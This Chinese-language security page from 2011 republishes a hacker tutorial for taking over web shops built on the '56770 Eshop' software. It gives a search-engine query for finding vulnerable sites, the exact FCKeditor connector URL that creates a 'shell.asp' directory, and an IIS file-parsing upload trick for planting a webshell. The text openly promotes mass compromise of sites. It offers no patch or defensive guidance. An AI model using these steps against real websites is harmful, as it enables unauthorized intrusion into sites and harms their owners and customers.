科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道网络安全乐彼多语言网店通杀拿shell

乐彼多语言网店通杀拿shell

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

  很老的一个0day了,但是以前给的利用方法是不正确,导致很多同学无法建立shell.asp目录,因此好多网站没被万人轮。

来源:zdnet整理 2011年9月1日

关键字: 网络安全 网络入侵

  • 评论
  • 分享微博
  • 分享邮件

  很老的一个0day了,但是以前给的利用方法是不正确,导致很多同学无法建立shell.asp目录,因此好多网站没被万人轮。

  下面就把正确的方法公布一下

  利用方法

  Google搜索:Powered By 56770 Eshop

  搜索 Powered By 56770 Eshop 获得约 43,700 条结果

  随便找一个网站

  1.在网站地址后面添加

  admin/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../connectors/asp/connector.asp

  

  2.在根目录后添加 admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

  创一个目录 为shell.asp

  3.上传一个 xxx.asp;jpg 然后连接 http://xxx.com/pic/UserFiles/file/shell.asp/xxx.asp;jpg 拿shell

  没什么技术含量,不过批量拿站还是不错的。

  ===============================================

  建议大家不要再去玩这个洞了,基本上都被搞过了,不是处的没意思,大部分都是万人轮的。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章